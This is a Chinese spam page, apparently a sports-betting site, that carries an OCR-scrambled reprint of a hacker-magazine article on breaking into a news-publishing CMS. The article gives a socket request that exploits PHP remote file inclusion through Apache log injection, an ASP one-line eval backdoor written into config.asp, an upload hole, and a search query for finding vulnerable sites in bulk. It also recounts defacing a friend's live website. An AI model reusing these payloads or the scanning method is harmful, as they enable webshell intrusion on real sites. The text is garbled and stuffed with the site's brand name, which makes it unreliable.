BOBty综合体育(中国)入口

BOBty综合体育(中国)入口 咨询热线:

公司新闻Decoration Design
公司新闻 >>当前位置:bobty综合体育 > 装修新闻 > 公司新闻 >

给站长俱乐部新闻bobty综合体育发布系统找漏洞

文章来源:    时间:2022-09-08

更多
 

bobty综合体育给站长俱乐部新闻发布系统找漏洞景……I………~I1ur--)栏目编辑)脚本小子)盯i呻抽y@hack节c1cn其实第二种和第三种漏洞是能够直接得到WebSheII的,这里先简单地跟大家解释一下,在高级部分我会详细讲解如何利用的。其原理就是把我们要执行的代码插入~lJApache的日志Log中新闻系统 漏洞,然后自己写代码模}l,~tPost方式向主机提交如下请求,这样就可以执行系统的命令了。print$soc。ket"GET"。$pam。index。php?GLOBALS[tpl#an~]。Sapache($apachepath]。"&0帕=$cmdHTTP/I。1\r\n";printSsocket"Host:´L$host。"\r\n´l。-printSsocket"Accept:+/+\r\n´:printSsocket,,Connection:close\r\n\r\n,;关于挖掘PHP远程文件包含漏洞的讲解到这里就算结束了,最后我再教大家一个在Google。corn索远程文件包含漏洞的方法。首先打开,搜索代码~include\(\$(。十)\):$lang:PHP",意思就是搜索以include开头的匹配结果($后面是任意的名称),如图9所示。

给站长俱乐部新闻bobty综合体育发布系统找漏洞

我们找到了7000个这样的程序,结合本文所写的找漏洞程序的特殊字符,就可以找到N多有漏洞的网站了,是不是很有成就感呢7呵呵,作为一个菜乌,重要的是要多多总结,时刻记录下认为重要的东西,总结得多了,我们的技术自然就会慢慢增长了。一一匝—~Cod。R啦溉-A-P}丝i£雌i2Ma0cd!ms-曲mal´i……I~CoRfI…I,。…rI´?n^…0:,:00´一。…t一´:t1e}2i0一0…rE´{btJ一:tc—tt1e,´一´『…Irrqj一:}´{,。:HP[hr0En自142/cf哺nBn[eb…!alohaInhD{f0…9l?【l,n´口_ltla这期文章就写到这里了,下期的主要内容是SQL注入漏洞,提前透露一下,我们可不是简单地分析一些普通的没有过滤变量直接带入SQL语句查询的漏洞,而是要深入到PHP脚本程序的本身去挖掘SQL注入漏洞。好了。我们下期见吧jJ朋友和我说,他使用的站长俱乐部新闻发布系统很不错,于是决定下载研究一下这套系统,要是能发现漏洞还可以在朋友面前炫耀一下。我就是这么的虚荣,真是没办法,呵呵。程序下载后,大致调试了一下,发现还真的像朋友说的那样具有严密的安全措施。

bobty综合体育给站长俱乐部新闻bobty综合体育发布系统找漏洞

防SQL注入,防数据库下载。本来发现上传好像存在点问题,在我的机器上调试的时候上传一直出错,可能是我使用的是试用版的原因。继续读上传页面。发现是用Session做判断,且要求是管理员才可以上传,不进后台根本就没有意义。继续往下读新闻系统 漏洞,又发现conn。asp文件存在问题,其代码如下。dimCOTLqJI看到了吗7数据库没有任何容错处理,一访问就暴出了caifuw。mdb默认数据库的绝对路径,对此我已经做了相应的动画演示。只要数据库是MDB´函;scripts。boyhackercn-E盖)栏目编辑)脚本小于)@0om誓盆式的,应该是能下载的,要是能破解出MD5密码的话。就可以得~iJWebSheII下面看看我是如何拿到这个系统的WebSheII的。我发现网站信息配置的内容是写在Inc目录下的config。asp文件中的,而不是放在数据中,这样就有机会拿~lJWebSheII了。再读一下代码,发现网站名称等信息只是过滤了空格就写入了config。asp文件中了。因此,我们只需要在配置信息的后面写上":evaIrequest("#")一就可以在配置文件中写入一句话后门了。第一个双引号是为了闭合前面的,这样config。

给站长俱乐部新闻bobty综合体育发布系统找漏洞

bobty综合体育asp配置信息就变成了"ConstSiteName="站长俱乐部":evaIrequest("#")"?网站名称"。后面的一个单引号用于注释掉多余的双引号。在本地测试成功后,我就拿朋友的站先开刀。谁让他总是在我士气低落的时候打击我。结果暴出数据库的路径后。竟然郁闷地发现数据库被修改成个非常变态的ASP后缀的了,只能望着数据库长叹了。后来到官方网站测试。发现数据库也被修改成一个变态的ASP后缀了。如图1所示。看来只能继续读代码了,看看是否还有其他的地方有问题。由于我下载的是new512free版。使用的时候某些功能总是提示"你下载的是试用版,这个功能不能使用,请联系站长测试完整版的程序",发现作者把这个版本的链接给修改了,指向那个提示页面了,本来发现发表评论里有的地方过滤得不好,还是有机会跨站的。继续翻文件,最终发现Upload—OrderPic。asp调用的是Upfile—OrderPic。asp来上传文件,这个文件没有向我开始测试的那个页面一样需要管理员权限,其主要代码如下。这段代码存在典型的上传漏洞。由于上传文件的路径是用常量UploadOrderPic来定义的,所以我们无法向动网那样来截断路径,后缀过滤得也是很严格的。

给站长俱乐部新闻bobty综合体育发布系统找漏洞

以前黑防上对这个有专门的分析,和以前动力漏洞的原理一样新闻系统 漏洞,我就不多说了。这下只要Upfile—OrderPic。asp文件没有删除的话,我们就可以构造提交表单拿WebShelI后来我构造了一个提交页面(已随文提供),成功地拿到了朋友网站的WebShelI,我替他把首页修饰了一下,感觉效果还不错。过了不长时间,他表情很诚恳地邀请我去吃饭。饭后我把这个系统存在的问题告诉了他。过了几天。他给我发来了他的网站,发现换新闻系统了,还附带了一句:还想威胁我请你吃饭吗7继续把我这个系统给我黑了,如果还能做到的话,吃饭的地方让你选。朋友们新闻系统 漏洞,一看到这句话我又来动力了,也许我们马上就能再见(文中所涉及的程序或代码,已收录入本期光盘杂志相关栏目;也可到黑防官方网站下载新闻系统 漏洞,详细地址请看公共论坛置顶帖)仂

bobty综合体育给站长俱乐部新闻bobty综合体育发布系统找漏洞

返回
版权所有:Copyright © 2022.bobty综合体育 版权所有 网站地图 电话:400-082-4236
地址:湖南省益阳市ICP备案编号:皖ICP备43629801号  技术支持: bobty综合体育模版

全国统一服务热线7*24小时为您在线服务